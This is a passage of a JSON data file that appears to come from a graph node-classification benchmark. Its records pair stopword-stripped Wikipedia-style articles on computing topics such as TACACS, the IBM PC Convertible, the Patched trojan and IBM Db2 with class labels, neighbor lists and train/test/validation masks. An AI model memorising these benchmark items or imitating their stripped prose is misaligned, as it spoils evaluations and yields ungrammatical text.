    "text": "TACACS:tacacs terminal access controller access-control system tacacs usually pronounced like tack-axe refers family related protocols handling remote authentication related services networked access control centralized server original tacacs protocol dates back 1984 used communicating authentication server common older unix networks spawned related protocols tacacs originally developed 1984 bbn technologies administering milnet ran unclassified network traffic darpa time would later evolve u.s. department defense niprnet originally designed means automate authentication – allowing someone already logged one host network connect another network without needing re-authenticate – first formally described bbn brian anderson december 1984 ietf rfc 927 cisco systems began supporting tacacs networking products late 1980s eventually adding several extensions protocol 1990 cisco extensions top tacacs became proprietary protocol called extended tacacs xtacacs although tacacs xtacacs open standards craig finseth university minnesota cisco assistance published description protocols 1993 ietf rfc 1492 informational purposes tacacs defined rfc 1492 uses either tcp udp port 49 default tacacs allows client accept username password send query tacacs authentication server sometimes called tacacs daemon simply tacacsd tacacsd uses tcp usually runs port 49 would determine whether accept deny authentication request send response back tip routing node accepting dial-up line connections user would normally want log would allow access based upon response way process making decision opened algorithms data used make decision complete control whomever running tacacs daemon xtacacs stands extended tacacs provides additional functionality tacacs protocol also separates authentication authorization accounting aaa functions separate processes even allowing handled separate servers technologies tacacs+ radius generally replaced tacacs xtacacs recently built updated networks tacacs+ entirely new protocol compatible predecessors tacacs xtacacs tacacs+ uses tcp radius operates udp since tcp connection oriented protocol tacacs+ implement transmission control radius however detect correct transmission errors like packet loss timeout etc since rides udp connectionless radius encrypts users password travels radius client radius server information username authorization accounting transmitted clear text therefore vulnerable different types attacks tacacs+ encrypts information mentioned therefore vulnerabilities present radius protocol tacacs+ cisco designed extension tacacs encrypts full content packet moreover provides granular control command command authorization",
    "neighbors": [
      7,
      3477,
      11413,
      2080,
      2083,
      8867,
      9635,
      2087,
      10924,
      6834,
      4663,
      5433,
      5568,
      10058,
      6993,
      6098,
      4435,
      6750,
      2143,
      8670,
      2274,
      6888,
      1012,
      5492,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 4243,
    "label": 9,
    "text": "ASTAP:astap astap advanced statistical analysis program general purpose analog electronic circuit simulator developed primarily in-house use ibm 1973 powerful program used simulation integrated circuit designs analysis statistical variations manufacturing process combination built-in monte carlo method capabilities allowed prediction performance electronic circuits wide range material parameters temperatures astap designed run ibm mainframe computers unlike spice used modified nodal analysis mna form system circuit equations astap instead used sparse tableau formulation sta construct solve sparse matrix sparse tableau formulation produced large sparse matrices required special techniques solve efficiently even time advantage sta statistical analysis originally outlined subsequent analysis circuit randomly varied parameters required changing entries matrix",
    "neighbors": [
      5881,
      3323,
      7819
    ],
    "mask": "Test"
  },
  {
    "node_id": 4244,
    "label": 3,
    "text": "IBM_PC_Convertible:ibm pc convertible ibm pc convertible first laptop computer released ibm released april 3 1986 convertible also first ibm computer use 3½-inch floppy disk format went become industry standard like modern laptops featured power management ability run batteries follow-up ibm portable model number 5140 replaced 1991 ibm ps/2 l40 sx japan ibm personal system/55note predecessor thinkpad ibm engineers 1983 reportedly developed tandy model 100-like laptop codenamed sweetpea estridge rejected pc compatible 1984 larger lcd screen another prototype p-14 reportedly failed chiclet rule especially poor reception data general-one display pc convertible used cmos version intel 8088 cpu running 4.77 mhz 256 kb ram expandable 640 kb dual 720 kb 3.5 floppy drives monochrome cga-compatible lcd screen price 2,000 weighed 13 pounds 5.8 kg featured built-in carrying handle pc convertible expansion capabilities proprietary isa bus-based port rear machine extension modules including small printer video output module could snapped place machine could also take internal modem room internal hard disk concept design body made german industrial designer richard sapper pressing power button computer turn put machine suspend mode would hold place long battery power avoided long boot-up process cmos 80c88 cpu static core held state indefinitely stopping system clock oscillator resume processing clock signal restarted long kept powered cmos 80c88 processor used little power clock signal stopped system ram convertible sram rather dram lower power consumption less circuitry fit cramped laptop case convertible 256k ram included 128k eventually also 256k memory cards available space 4 memory cards system least one 256k card order able upgrade system full 640k base memory screen half size lid text characters graphics compressed vertically appearing half normal height display capable 80x25 text graphics modes 640x200 320x200 pixels pressing lever two floppy drives display detached entire screen unit feature allowed convenient use full-size desktop monitor one desk early forerunner docking station concept well apple powerbook duo machine sold poorly number reasons convertible heavy much faster portable replaced despite newer cmos processor use static ram traditional pc expansion ports serial ports parallel port without add-on hard-to-read oddly-shaped lcd screen first screens lacked backlight also competed faster portables based intel 80286 offered optional hard drives companies compaq laptops companies toshiba zenith lighter offered similar specifications sometimes half price keyboard also widely criticized",
    "neighbors": [
      1121,
      6148,
      3304,
      11657,
      780,
      8301,
      7983,
      1776,
      6129,
      5368,
      9338,
      3323,
      8893
    ],
    "mask": "Test"
  },
  {
    "node_id": 4245,
    "label": 4,
    "text": "Patched_(malware):patched malware win32/patched computer trojan targeting microsoft windows operating system first detected october 2008 files detected trojan.win32.patched usually windows components patched malicious application purpose patching varies example certain malware patches system components order disable security windows safe file check feature malware add parts code system component patch certain functions original file point appended code trojan operates modification legitimate systems files infected system additionally malware add parts code system component patch certain functions original file point appended code frequently patched components obvious symptoms indicate presence malware affected machine additionally common symptoms associated threat alert notifications installed antivirus software may symptom advised delete rename quarantine patched windows components may affect system stability even though windows locks main files active might still possible affect anti-virus software detected certain file trojan.win32.patched attempt create copy patched file try restore contents add renaming command windows registry order replace patched file cleaned one next windows startup restoration one recent system restore points may advisable many cases patched system component replaced clean one restoring system restore point advised backup personal data avoid losing windows rolls back previously saved state windows installation discs contain repair option replace patched file another course action includes attaching hard drive patched file slave similar windows-based system boot replace patched file file taken clean system",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      6797,
      9233,
      8978,
      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      7983,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      3320,
      3395,
      4165,
      2508,
      7515,
      3941,
      107,
      877,
      4344,
      2041,
      5245,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 4246,
    "label": 3,
    "text": "Zero_insertion_force:zero insertion force zero insertion force zif type ic socket electrical connector requires little force insertion zif socket ic inserted lever slider side socket moved pushing sprung contacts apart ic inserted little force generally weight ic sufficient external downward force required lever moved back allowing contacts close grip pins ic zif sockets much expensive standard ic sockets also tend take larger board area due space taken lever mechanism therefore used good reason normal integrated circuit ic socket requires ic pushed sprung contacts grip friction ic hundreds pins total insertion force large hundreds newtons leading danger damage device circuit board also even relatively small pin counts pin extraction fairly awkward carries significant risk bending pins particularly person performing extraction n't much practice board crowded low insertion force lif sockets reduce issues insertion extraction lower insertion force conventional socket likely produce less reliable connections large zif sockets commonly found mounted pc motherboards used mid 1990s forward cpu sockets designed support particular range cpus allowing computer retailers consumers assemble motherboard/cpu combinations based individual budget requirements rest electronics industry largely abandoned sockets kind instead moved use surface mount components soldered directly board smaller zif sockets commonly used chip-testing programming equipment e.g. programming testing eeproms microcontrollers etc standard dip packages come number widths measured pin centers 0.3 7.62 mm 0.6 15.24 mm common allow design programmers similar devices support range devices universal test sockets produced wide slots pins drop allowing devices differing widths inserted zif sockets used ball grid array chips particularly development sockets tend unreliable failing grab solder balls another type bga socket also free insertion force zif socket traditional sense better job using spring pins push underneath balls zif wire-to-board connectors used attaching wires printed circuit boards inside electronic equipment example would cable lcd screen motherboard laptops wires often formed ribbon cable pre-stripped bare ends placed inside connector two sliding parts connector pushed together causing grip wires important advantage system require mating half fitted wire ends therefore saving space cost inside miniaturised equipment see flexible flat cable zif tape connections used connecting parallel ata serial ata disk drives mostly drives 1.8-inch form factor pata hard drives zif-style connectors used primarily design ultra-portable notebooks since phased sata relatively small-form-factor connector default mini-sata msata used even smaller form factors required internally nearly hard drives use zif tape connect circuit board platter motor zif tape connections also heavily used design ipod range portable media players hard drive also connections main circuit board three types zif connectors known exist 1.8 inch pata drives zif-24 zif-40 zif-50 24 40 50 pins respectively",
    "neighbors": [
      3588,
      8452,
      10260,
      7445,
      3992,
      3995,
      4252,
      4767,
      9122,
      682,
      4523,
      11183,
      3892,
      8629,
      4537,
      2874,
      4805,
      9157,
      3783,
      7247,
      7122,
      4179,
      4185,
      7132,
      9570,
      5859,
      10468,
      1260,
      7788,
      7151,
      1651,
      9592
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4247,
    "label": 4,
    "text": "Webroot_Antivirus_with_Spy_Sweeper:webroot antivirus spy sweeper webroot antivirus spy sweeper previously known webroot antivirus antispyware antimalware utility developed webroot software product added antivirus detection engine company ’ previous standalone antispyware product spy sweeper product originally launched october 30 2006 name spy sweeper antivirus product re-launched year later october 24 2007 webroot antivirus antispyware firewall enhanced rebranded version product included new two-way firewall built various changes including windows vista compatibility recent version product webroot antivirus spy sweeper 7.0 launched july 27 2010 versions product antivirus antispyware malware detection within various changes user interfaces system shields additional features added compatibilities new microsoft windows operating systems changed version 5.2 received editor ’ choice award integration effectiveness combining antispyware antivirus utilities one product shield names changed version including spy communication shield renamed internet communication shield spy installation shield changed installation shield product update included quick sweep option allowed users rapidly scan computer use many system resources full sweep option would various smart shields protect pc changes activex controls common browser threats update also included daily definition flex defs flexible definitions updates version 5.3 added windows vista compatibility product version 5.5 added several changes real-time protection shields within product execution shield file system shield replaced old spy installation shield still work together block malicious programs executing reading changing files “ system services shield ” added prevent unauthorized changes numerous system services microsoft windows email attachments shield also added allows scanning email attachments malware behavioral based detection also added release allowing zero-day threats dealt hit system version 5.8 added compatibility 64-bit vista “ gamer mode ” allows play online games uninterrupted notifications background shields run background product included 1gb online storage space time release firewall component found earlier versions product removed release significant user interface changes made 7.0 version software well optimized scanning feature new ui commented reviewers simplistic easier use previous versions tray icons added notify user state program currently three icons used include br “ fix ” feature added 7.0 versions allows users opt webroot software resolve situation without user interaction version added automatic periodic scans computer eliminated option quick sweeps full sweeps seen previous versions default 7.0 version eliminated option run virus-scanning access web portal accessible computer web access includes account information software license status keycode well access certain tasks upgrading software installing computers 7.0 version product require reboot installation previous versions webroot antivirus spysweeper received virus bulletin certifications four times including april 2010 windows ex december 2009 windows 7 august 2008 windows xp february 2003 windows server xp webroot antivirus spysweeper icsa labs certified desktop/server anti-virus detection anti-virus cleaning windows 7 32 64 bit numerous certifications dating 2008 received west coast labs product including anti-spyware desktop anti-trojan anti-virus desktop anti-virus disinfection desktop firewall",
    "neighbors": [
      2213,
      8998,
      10026,
      6797,
      3342,
      7983,
      2257,
      9713,
      6516,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 4248,
    "label": 2,
    "text": "Windows_System_Assessment_Tool:windows system assessment tool windows system assessment tool winsat module microsoft windows vista windows 7 windows 8 windows 10 available control panel performance information tools except windows 8.1 windows 10 measures various performance characteristics capabilities hardware running reports windows experience index wei score wei includes five subscores processor memory 2d graphics 3d graphics disk basescore equal lowest subscores average subscores winsat reports wei scores scale 1.0 5.9 windows vista 7.9 windows 7 9.9 windows 8 windows 10 wei enables users match computer hardware performance performance requirements software example aero graphical user interface automatically enabled unless system wei score 3 higher wei also used show part system would expected provide greatest increase performance upgraded example computer lowest subscore memory would benefit ram upgrade adding faster hard drive component detailed raw performance information like actual disk bandwidth obtained invoking codice_1 command line also allows specific tests re-run obtaining wei score command line done invoking codice_2 also updates value stored codice_3 xml files stored easily hacked report fake performance values wei also available applications api configure function hardware performance taking advantage capabilities without becoming unacceptably slow windows experience index score displayed windows 8.1 onwards graphical user interface winsat removed versions windows although command line winsat tool still exists operates correctly along final score launching command shell games according article pc pro microsoft removed winsat gui order promote idea kinds hardware run windows 8 equally well 2003 game developers conference dean lester microsoft general manager windows graphics gaming stated interview gamespot microsoft intended focus improvements pc gaming experience part new gaming initiative next version windows windows vista codenamed longhorn lester stated part initiative operating system would include games folder would centralize settings pertinent gamers among features display driver streamlining parental controls games ability start windows game directly optical media installation—in manner similar games designed video game console microsoft would also require new method displaying system requirements retail packaging windows games rating system would categorize games based numerical system 2004 lester expanded microsoft intentions stating company would work hardware manufacturers create pcs windows vista used level system designate performance capabilities system hardware xbox 360 peripherals would fully compatible operating system windows experience index feature windows vista relies measurements taken winsat provide accurate assessment system capabilities—these capabilities presented form rating higher rating indicates better performance preliminary design elements created microsoft robert stein 2004 suggest winsat intended rate user hardware out-of-box experience design decision would retained operating system release manufacturing windows hardware engineering conference 2005 microsoft formally unveiled existence winsat presented technology games one would allow windows vista make decisions whether enable desktop composition based machine hardware capabilities winsat would remain key focus throughout development operating system release manufacturing winsat windows vista windows 7 performs following tests running tests show progress bar working background animation aero glass deactivated windows vista windows 7 testing tool properly assess graphics card cpu windows 8 winsat runs maintenance scheduler every week default schedule 1am sundays maintenance scheduler collates various os tasks schedule computer randomly interrupted individual tasks scheduler wakes computer sleep runs scheduled tasks puts computer back sleep weekly task winsat runs long enough detect hardware changes tests run winsat simply ends existing scores must valid winsat perform tests laptop battery-operated",
    "neighbors": [
      11270,
      2568,
      5643,
      4624,
      6674,
      537,
      8729,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      9780,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      622,
      1647,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8834,
      6281,
      8841,
      6797,
      2193,
      9874,
      10900,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      5300,
      7351,
      7356,
      2749,
      10428,
      2244,
      8391,
      200,
      9420,
      1741,
      1750,
      9946,
      2782,
      9442,
      740,
      4836,
      4326,
      2279,
      1770,
      5356,
      3308,
      10989,
      1776,
      10993,
      4850,
      7411,
      3834,
      6396,
      1791,
      8959,
      11519,
      1801,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      1844,
      9525,
      11572,
      10039,
      6972,
      5437,
      7486,
      3394,
      8517,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      4465,
      9593,
      2943,
      3970,
      10631,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      10727,
      2027,
      6637,
      9709,
      2545,
      6641,
      499,
      8692,
      3573,
      11249
    ],
    "mask": "Test"
  },
  {
    "node_id": 4249,
    "label": 4,
    "text": "Managed_VoIP_Service:managed voip service computing managed voip services mvs simply put voip services outsourced company providing service managed voip service provider managed voip services provide enterprises necessary skills expertise assure voice quality meets expectations managed voip services equipment software included along network operations centers technical resources usage-based pricing replaced fixed flat-rate billing based number users number network elements managed criteria relevant given business making ongoing costs predictable manageable",
    "neighbors": [
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4250,
    "label": 4,
    "text": "Ralph_Echemendia:ralph echemendia ralph rafael echemendia cyber security specialist known ethical hacker specialises protecting intellectual property entertainment industry educating security echemendia born cuba raised miami attended miami senior high first computer commodore 64 began hacking age 14 echemendia began working entertainment created secure online ticketing system marley family also investigated early online leak eminem album 2011 echemendia lead technical investigator breach security led leaking worked identify person responsible leaking behind scenes pictures videos film almost year movie ’ release 2015 echemendia worked stone snowden providing technical supervision supported actors explaining background technical terms script echemendia screenwriter kieran fitzgerald also worked edward snowden replicate actual nsa log-in screen 2016 echemendia became hacking consultant directors producers nerve",
    "neighbors": [
      7887,
      3495
    ],
    "mask": "Train"
  },
  {
    "node_id": 4251,
    "label": 2,
    "text": "Avie_Tevanian:avie tevanian dr. avadis avie tevanian american computer scientist carnegie mellon university principal designer engineer mach operating system leveraged work next inc. foundation nextstep operating system senior vice president software engineering apple 1997 2003 chief software technology officer 2003 2006 redesigned nextstep become macos became ios longtime friend steve jobs tevanian westbrook maine armenian descent tevanian cloned 1980s arcade game missile command giving name version xerox alto mac missiles macintosh platform b.a mathematics university rochester m.s ph.d. degrees computer science carnegie mellon university principal designer engineer mach operating system vice president software engineering next inc. responsible managing next software engineering department designed nextstep operating system based upon previous academic work mach senior vice president software engineering apple 1997 2003 chief software technology officer 2003 2006 redesigned nextstep become macos became ios united states v. microsoft 2001 witness united states department justice testifying microsoft tevanian left apple march 31 2006 joined board dolby labs theranos inc resigned board theranos late 2007 acrimonious ending faced legal threats forced sign waiver waive right buy company cofounder shares may 2006 joined board tellme networks later sold microsoft january 12 2010 became managing director elevation partners july 2015 cofounded nextequity partners currently serving managing director",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      11289,
      6186,
      6700,
      1074,
      9778,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      6234,
      9826,
      5733,
      8806,
      3691,
      2676,
      10871,
      6264,
      7806,
      6783,
      2686,
      10878,
      8842,
      10386,
      5784,
      1177,
      2207,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2282,
      1772,
      4844,
      8441,
      2819,
      1290,
      9999,
      784,
      4888,
      10023,
      4399,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2388,
      6495,
      9063,
      10602,
      3948,
      1389,
      11118,
      11629,
      10608,
      6023,
      7561,
      6539,
      1428,
      6554,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654,
      511
    ],
    "mask": "Train"
  },
  {
    "node_id": 4252,
    "label": 3,
    "text": "Socket_7:socket 7 socket 7 physical electrical specification x86-style cpu socket personal computer motherboard released june 1995 socket supersedes earlier socket 5 accepts p5 pentium microprocessors manufactured intel well compatibles made cyrix/ibm amd idt others socket 7 socket supported wide range cpus different manufacturers wide range speeds differences socket 5 socket 7 socket 7 extra pin designed provide dual split rail voltage opposed socket 5 single voltage however motherboard manufacturers supported dual voltage boards initially socket 7 backwards compatible socket 5 cpu placed socket 7 motherboard processors used socket 7 amd k5 k6 cyrix 6x86 6x86mx idt winchip intel p5 pentium 2.5–3.5 v 75–200 mhz pentium mmx 166–233 mhz rise technology mp6 amd geode lx geode gx used socket 7 2015 socket 7 typically uses 321-pin arranged 19 19 pins spga zif socket rare 296-pin arranged 37 37 pins spga lif socket size 1.95 x 1.95 4.95 cm x 4.95 cm extension socket 7 super socket 7 developed amd k6-2 k6-iii processors operate higher clock rate use agp socket 7 socket 8 replaced slot 1 slot 2 1999",
    "neighbors": [
      3588,
      6151,
      1677,
      5901,
      5523,
      8851,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      799,
      6175,
      7712,
      7714,
      10019,
      3883,
      2604,
      4523,
      2350,
      6192,
      9649,
      4537,
      2874,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      473,
      4185,
      7002,
      9945,
      1501,
      11484,
      9570,
      10468,
      613,
      2791,
      8552,
      8442,
      1260,
      4717,
      10734,
      7151,
      1776,
      10225,
      371,
      499,
      9592,
      3194,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 4253,
    "label": 4,
    "text": "Common_Criteria_Evaluation_and_Validation_Scheme:common criteria evaluation validation scheme common criteria evaluation validation scheme ccevs united states government program administered national information assurance partnership niap evaluate security functionality information technology conformance common criteria international standard new standard uses protection profiles common criteria standards certify product change happened 2009 change implemented bring credibility back cc brand stated goal making change ensure achievable repeatable testable evaluations ccevs program partnership u.s. government industry assist consumers scheme intended serve many communities interest diverse roles responsibilities community includes product developers product vendors value-added resellers systems integrators security researchers acquisition/procurement authorities consumers products auditors accreditors individuals deciding fitness operation products within respective organizations close cooperation government industry paramount success scheme realization objectives validation body ultimate responsibility operation ccevs accordance niap policies procedures appropriate interpret amend policies procedures nist nsa responsible providing sufficient resources niap validation body may carry responsibilities however 2009 niap reached vendors labs academia customers help evaluation products therefore diminishing reliance nsa validation body led director deputy director selected nist nsa management personnel include validators technical experts various technology areas validation body ensures appropriate mechanisms place protect interests parties within ccevs participating process security evaluation disputes brought forth participating party i.e sponsor evaluation product protection profile developer cctl concerning operation ccevs associated activities shall referred validation body resolution product certified listed pp compliant niap product compliant list pcl",
    "neighbors": [
      8904,
      1905,
      6593,
      5865
    ],
    "mask": "Test"
  },
  {
    "node_id": 4254,
    "label": 1,
    "text": "Supra-entity:supra-entity supra-entity conceptual element derived entity-relationship e-r technique information system modeling similar entity defined higher level encompassing individual entity occurrences parts groups groups parts parts groups concepts supra-entity supra-relationship supra-attribute created published gonzález muller work “ business entity-relationship model innovation entrepreneurship management ” applied first time work conceptually model key elements interrelationships “ business ” reality supra-entities supra-relationships supra-attributes objective covering diversity situations perspectives existing reality integrated representation higher level individual occurrences multiple parts groups entities relationships according different criteria structures properties attributes association supra-entities level partition grouping supra-entity formed individual entities multiple structures entity parts multiple structures entity groups multiple structures groups entity parts parts entity groups associated closed squared structure shown attached diagram representation multiple structures parts groups groups parts parts entity groups form supra-entity done strips connecting different elements instead usual line symbol used single structure entity-relationship models example supra-entity products business sector shown next diagram addition application modeling development databases information systems supra-entities supra-relationships allow redefinition concept innovation degrees types clarity amplitude facilitates generation ideas innovation capacity general business innovation defined supra-entity domain scope consists creation generation introduction new occurrences supra-entity elements good results success first invention major innovation improved minor incremental innovation including new occurrences replicate similar previous ones example apply definition innovation supra-entity products obtain product innovations consist creation generation introduction market new element occurrences supra-entity products good results success first invention major innovation improved minor incremental innovation including new occurrences replicate similar previous ones business innovation traditionally identified introduction marketing new improved products processes market innovation necessarily require technological innovate identifying new needs new customer segments new ways getting product customer new forms agreements contracting new environments etc summary possible innovate different supra-entities supra-relationships constitute business entity-relationship model achieving different types innovations increasing innovation capacity business",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 4255,
    "label": 1,
    "text": "IBM_Db2_Family:ibm db2 family db2 family data management products including database servers developed ibm support relational model recent years products extended support object-relational features non-relational structures like json xml brand name styled db2 creation 1983 2017 historically unlike database vendors ibm produced platform-specific db2 product major operating systems however 1990s ibm changed track produced db2 mostly-common product designed mostly common code base l-u-w linux-unix-windows db2 z db2 different result use different drivers db2 traces roots back beginning 1970s edgar f. codd researcher working ibm described theory relational databases june 1970 published model data manipulation 1974 ibm san jose research center developed relational dbms system r implement codd concepts key development system r project sql apply relational model codd needed relational-database language named dsl/alpha time ibm n't believe potential codd ideas leaving implementation group programmers codd supervision violated several fundamentals codd relational model result structured english query language sequel ibm released first relational-database product wanted commercial-quality sublanguage well overhauled sequel renamed basically-new language structured query language sql ibm bought metaphor computer systems utilize gui interface encapsulating sql platform already use since mid 80 parallel development sql ibm also developed query example qbe first graphical query language ibm first commercial relational-database product sql/ds released dos/vse vm/cms operating systems 1981 1976 ibm released query example vm platform table-oriented front-end produced linear-syntax language drove transactions relational database later qmf feature db2 produced real sql brought qbe look feel db2 name db2 ibm database 2 first given database management system dbms 1983 ibm released db2 mvs mainframe platform years db2 full-function dbms exclusively available ibm mainframes later ibm brought db2 platforms including os/2 unix ms windows servers linux including linux z systems pdas process occurred 1990s inspiration mainframe version db2 architecture came part ibm ims hierarchical database dedicated database-manipulation language ibm dl/i db2 also embedded i5/os operating system ibm system iseries formerly as/400 versions available z/vse z/vm earlier version code would become db2 luw linux unix windows part extended edition component os/2 called database manager ibm extended functionality database manager number times including addition distributed database functionality means distributed relational database architecture drda allowed shared access database remote location lan note drda based objects protocols defined distributed data management architecture ddm eventually ibm took decision completely rewrite software new version database manager called db2/2 db2/6000 respectively versions db2 different code bases followed '/ naming convention became db2/400 as/400 db2/vse dos/vse environment db2/vm vm operating system ibm lawyers stopped handy naming convention used decided products needed called product platform example db2 os/390 next iteration mainframe server-based products named db2 universal database db2 udb mid-1990s ibm released clustered db2 implementation called db2 parallel edition initially ran aix edition allowed scalability providing shared-nothing architecture single large database partitioned across multiple db2 servers communicate high-speed interconnect db2 edition eventually ported linux unix windows luw platforms renamed db2 extended enterprise edition eee ibm refers product database partitioning feature dpf bundles flagship db2 enterprise product informix corporation acquired illustra made database engine object-sql dbms introducing universal server oracle ibm followed suit changing database engines capable object-relational extensions 2001 ibm bought informix software following years incorporated informix technology db2 product suite db2 technically considered object-sql dbms mid-2006 ibm announced viper codename db2 9 distributed platforms z/os db2 9 z/os announced early 2007 ibm claimed new db2 first relational database store xml natively enhancements include oltp-related improvements distributed platforms business intelligence/data warehousing-related improvements z/os self-tuning self-managing features additional 64-bit exploitation especially virtual storage z/os stored procedure performance enhancements z/os continued convergence sql vocabularies z/os distributed platforms october 2007 ibm announced viper 2 codename db2 9.5 distributed platforms three key themes release simplified management business critical reliability agile xml development june 2009 ibm announced cobra codename db2 9.7 luw db2 9.7 added data compression database indexes temporary tables large objects db2 9.7 also supported native xml data hash partitioning database partitioning range partitioning table partitioning multi-dimensional clustering native xml features allows users directly work xml data warehouse environments db2 9.7 also added several features make easier oracle database users work db2 include support commonly used sql syntax pl/sql syntax scripting syntax data types oracle database db2 9.7 also enhanced concurrency model exhibit behavior familiar users oracle database microsoft sql server october 2009 ibm introduced second major release year announced db2 purescale db2 purescale database cluster solution non-mainframe platforms suitable online transaction processing oltp workloads ibm based design db2 purescale parallel sysplex implementation db2 data sharing mainframe db2 purescale provides fault-tolerant architecture shared-disk storage db2 purescale system grow 128 database servers provides continuous availability automatic load balancing 2009 announced db2 engine mysql allows users system platform natively access db2 ibm operating system formerly called as/400 users platforms access files mysql interface system predecessors as/400 system/38 db2 tightly integrated operating system comes part operating system provides journaling triggers features early 2012 ibm announced next version db2 db2 10.1 code name galileo linux unix windows db2 10.1 contained number new data management capabilities including row column access control enables ‘ fine-grained ’ control database multi-temperature data management moves data cost effective storage based hot cold frequently data accessed data ibm also introduced ‘ adaptive compression ’ capability db2 10.1 new approach compressing data tables june 2013 ibm released db2 10.5 code name kepler 12 april 2016 ibm announced db2 luw 11.1 june 2016 released mid-2017 ibm re-branded db2 dashdb product offerings amended names db2 db2 z/os mainframe available traditional product packaging value unit edition allows customers instead pay one-time charge db2 also powers ibm infosphere warehouse offers data warehouse capabilities infosphere warehouse available z/os includes several bi features etl data mining olap acceleration in-line analytics db2 10.5 linux unix windows contains functionality tools offered prior generation db2 infosphere warehouse linux unix windows ibm provides three cloud services db2 db2 administered either command-line gui command-line interface requires knowledge product easily scripted automated gui multi-platform java client contains variety wizards suitable novice users db2 supports sql xquery db2 native implementation xml data storage xml data stored xml relational data clob data faster access using xquery db2 apis rexx pl/i cobol rpg fortran c++ c delphi .net cli java python perl php ruby many programming languages db2 also supports integration eclipse visual studio integrated development environments purequery ibm data access platform focused applications access data purequery supports java .net purequery provides access data databases in-memory java objects via tools apis runtime environment delivered ibm data studio developer ibm data studio purequery runtime important feature db2 computer programs error handling sql communications area sqlca structure used exclusively within db2 program return error information application program every sql statement executed primary singularly useful error diagnostic held field sqlcode within sqlca block sql return code values later versions db2 added functionality complexity execution sql multiple errors warnings could returned execution sql statement may example initiated database trigger sql statements instead original sqlca error information retrieved successive executions get diagnostics statement see sql return codes comprehensive list common sqlcodes",
    "neighbors": [
      3,
      8201,
      1037,
      2068,
      4630,
      1049,
      5658,
      9245,
      2089,
      5677,
      10286,
      7217,
      7733,
      9286,
      10326,
      8792,
      3171,
      9828,
      2669,
      6775,
      2168,
      1146,
      6797,
      8340,
      10389,
      4263,
      6311,
      10413,
      9397,
      6850,
      4817,
      2775,
      2780,
      734,
      10471,
      5356,
      6383,
      9455,
      3323,
      5379,
      5380,
      11024,
      8979,
      5397,
      7446,
      10518,
      1816,
      5403,
      2344,
      7983,
      8502,
      823,
      10040,
      10048,
      5953,
      5450,
      2901,
      3413,
      863,
      8554,
      7022,
      9075,
      5492,
      8052,
      1399,
      3960,
      8582,
      10632,
      5006,
      2456,
      10137,
      11673,
      9631,
      9634,
      7080,
      7607,
      5051,
      3004,
      8644,
      9177,
      987,
      477,
      479,
      4065,
      3556,
      3045,
      6124,
      2544,
      10737,
      499,
      3573,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4256,
    "label": 5,
    "text": "Quadrature-division_multiple_access:quadrature-division multiple access quadrature-division multiple access qdma radio protocol term combines two standard terms telecommunications cdma qpsk qdma used local area networks usually wireless short-range wimax cdma qdma especially suitable modern communications example transmission short messages sms mms communication motion cars trains etc establishment unplanned links traditional tdma fdma require lot overhead set link parameter new user detect user left allocation free allocated another cdma qdma new user simply allocated new code ready go may impose slight load spectrum system devised absorb controlled measure collisions continue operations high level quality service",
    "neighbors": [
      2458,
      11181
    ],
    "mask": "Test"
  },
  {
    "node_id": 4257,
    "label": 3,
    "text": "SVI-738:svi-738 spectravideo svi-738 x'press msx1 compatible home computer manufactured spectravideo 1985 although compatible msx 1.0 standard incorporates several extensions standard 80-column display serial rs-232 built-in 3.5 floppy drive many hardware-compatible msx 2.0 standard system whole leading referred msx 1.5 computer along sony hb-101 canon v-8 casio mx-10 hitachi mb-h1 portable computer based msx standard hence title x'press came packaged carrying bag addition manuals booklets software cp/m 2.2 msx-dos 1.0 disk containing special demonstration program featuring astronaut flying screen demonstrating computer graphic capabilitites listing facts computer rom ram sizes along disk drive integrated serial port stood use graphics chip specified msx-2 standard although use 16 kb vram allowed add 80 column mode together bugs first model design konami scc-sound based cartridges work bad sound among reasons msx 1.5 moniker ran microsoft disk basic 1.0 rom turned disk non-autoexecutable disk inserted computer marketed mainly europe australasia middle east poland marketed centralna składnica harcerska price 590 000 polish złotys average salary two months time msx computer marketed poland equipped several schools version svi-738 sold altered keyboard rom order provide polish-specific characters could also found schools finland spain initially distributed indescomp creation spanish subsidiary united kingdom sold £399.95 svi-738 also sold united states",
    "neighbors": [
      10658,
      11462,
      1801,
      3406,
      7983,
      1776,
      9006,
      9998,
      4409
    ],
    "mask": "Test"
  },
  {
    "node_id": 4258,
    "label": 3,
